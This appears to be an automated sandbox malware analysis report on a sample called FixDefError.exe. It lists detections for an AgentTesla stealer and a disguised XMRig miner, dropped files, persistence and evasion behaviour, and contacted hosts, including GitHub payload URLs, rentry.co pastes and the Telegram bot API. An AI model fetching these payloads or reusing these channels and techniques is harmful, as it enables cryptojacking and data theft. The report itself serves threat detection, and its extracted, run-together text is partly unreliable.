      Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Timestomp      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Masquerading      		Proc Filesystem1
      System Network Configuration Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
      Process Injection      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 829697 Sample: FixDefError.exe Startdate: 19/03/2023 Architecture: WINDOWS Score: 100 67 www.google.com 2->67 69 rentry.co 2->69 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 8 other signatures 2->87 10 FixDefError.exe 5 2->10         started        13 RegSvc.exe 2->13         started        17 svchost.exe 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 63 C:\Users\user\AppData\...\ProgramStarter.exe, PE32 10->63 dropped 65 C:\Users\user\AppData\...\FixDefError.exe.log, ASCII 10->65 dropped 21 ProgramStarter.exe 15 27 10->21         started        77 rentry.co 13->77 105 Machine Learning detection for dropped file 13->105 107 Changes security center settings (notifications, updates, antivirus, firewall) 17->107 79 192.168.2.1 unknown unknown 19->79 file6 signatures7 process8 dnsIp9 71 api4.ipify.org 104.237.62.211, 443, 49686 WEBNXUS United States 21->71 73 api.telegram.org 149.154.167.220, 443, 49687 TELEGRAMRU United Kingdom 21->73 75 5 other IPs or domains 21->75 55 C:\ProgramData\RuntimeBrokerData\svhost.exe, PE32+ 21->55 dropped 57 C:\ProgramData\...\WinRing0x64.sys, PE32+ 21->57 dropped 59 C:\ProgramData\...\RuntimeBroker.exe, PE32 21->59 dropped 61 2 other malicious files 21->61 dropped 89 Antivirus detection for dropped file 21->89 91 Multi AV Scanner detection for dropped file 21->91 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->93 95 4 other signatures 21->95 26 cmd.exe 1 21->26         started        29 cmd.exe 21->29         started        31 cmd.exe 1 21->31         started        33 14 other processes 21->33 file10 signatures11 process12 signatures13 97 Encrypted powershell cmdline option found 26->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 26->99 101 Uses powercfg.exe to modify the power settings 26->101 35 powershell.exe 22 26->35         started        37 conhost.exe 26->37         started        103 Modifies power options to not sleep / hibernate 29->103 39 powercfg.exe 29->39         started        49 6 other processes 29->49 41 conhost.exe 31->41         started        43 schtasks.exe 1 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 33->47         started        51 26 other processes 33->51 process14 process15 53 Conhost.exe 39->53         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FixDefError.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      FixDefError.exe39%VirustotalBrowse
      FixDefError.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\ProgramData\RuntimeBrokerData\svhost.exe100%AviraHEUR/AGEN.1203240
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe100%AviraHEUR/AGEN.1236409
      C:\ProgramData\RuntimeBrokerData\RegSvc.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\svhost.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys5%ReversingLabs
      C:\ProgramData\RuntimeBrokerData\svhost.exe81%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.ProgramStarter.exe.750000.0.unpack100%AviraHEUR/AGEN.1236409Download File

      Domains

      SourceDetectionScannerLabelLink
      rentry.co0%VirustotalBrowse
      raw.githubusercontent.com1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.fontbureau.comgrita0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.galapagosdesign.com/0%URL Reputationsafe
      https://render.githubusercontent.com0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://www.founder.com.cn/cnTF0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://www.fontbureau.comicta0%URL Reputationsafe
      https://xmrig.com/wizard0%URL Reputationsafe
      https://%s.xboxlive.com0%URL Reputationsafe
      http://www.carterandcone.comn0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      https://dynamic.t0%URL Reputationsafe
      https://xmrig.com/benchmark/%s0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.carterandcone.comams0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      https://api.telegram.org40%URL Reputationsafe
      https://github.com40%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.de0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.agfamonotype.0%URL Reputationsafe
      https://xmrig.com/wizard%s0%URL Reputationsafe
      http://www.urwpp.deF0%URL Reputationsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe0%Avira URL Cloudsafe
      http://www.fontbureau.comueom80%Avira URL Cloudsafe
      http://www.urwpp.de-0%Avira URL Cloudsafe
      https://api.ipify.org8:0%Avira URL Cloudsafe
      https://rentry.co0%Avira URL Cloudsafe
      https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys0%Avira URL Cloudsafe
      https://rentry.co0%VirustotalBrowse
      https://raw.githubusercontent.com40%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe1%VirustotalBrowse
      http://www.fontbureau.comgr0%Avira URL Cloudsafe
      https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw0%Avira URL Cloudsafe
      https://raw.githubusercontent.com0%Avira URL Cloudsafe
      http://raw.githubusercontent.com0%Avira URL Cloudsafe
      http://www.fontbureau.com-s0%Avira URL Cloudsafe
      http://www.tiro.comlic;0%Avira URL Cloudsafe
      http://www.fontbureau.com773.0%Avira URL Cloudsafe
      http://www.sandoll.co.kreV0%Avira URL Cloudsafe
      http://www.tiro.comu0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      api4.ipify.org
      		104.237.62.211
      		truefalse
        		high
        github.com
        		140.82.121.3
        		truefalse
          		high
          rentry.co
          		198.251.88.130
          		truefalseunknown
          raw.githubusercontent.com
          		185.199.111.133
          		truefalseunknown
          www.google.com
          		142.251.209.36
          		truefalse
            		high
            api.telegram.org
            		149.154.167.220
            		truefalse
              		high
              api.ipify.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exefalse
                  		high
                  https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exefalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sysfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/rawfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/botProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.sajatypeworks.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comueom8FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comgritaProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.ipify.org8:ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urwpp.de-FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.urwpp.deDPleaseFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.bingmapsportal.comsvchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://rentry.coRegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.galapagosdesign.com/ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://render.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnTFFixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://go.micropowershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxNRegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comictaFixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://raw.githubusercontent.com4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://xmrig.com/wizardsvhost.exe.1.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://%s.xboxlive.comsvchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comnFixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comgrProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dynamic.tsvchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://raw.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://raw.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://xmrig.com/benchmark/%ssvhost.exe.1.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com-sProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designersGFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/?FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/bTheFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designersJProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designers?FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.carterandcone.comamsFixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.tiro.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.goodfont.co.krFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.carterandcone.comFixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.typography.netDFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://github.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://fontfabrik.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://api.telegram.org4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designersmProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.tiro.comlic;FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            http://www.fontbureau.com/designersaFixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com773.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://github.com4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://www.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
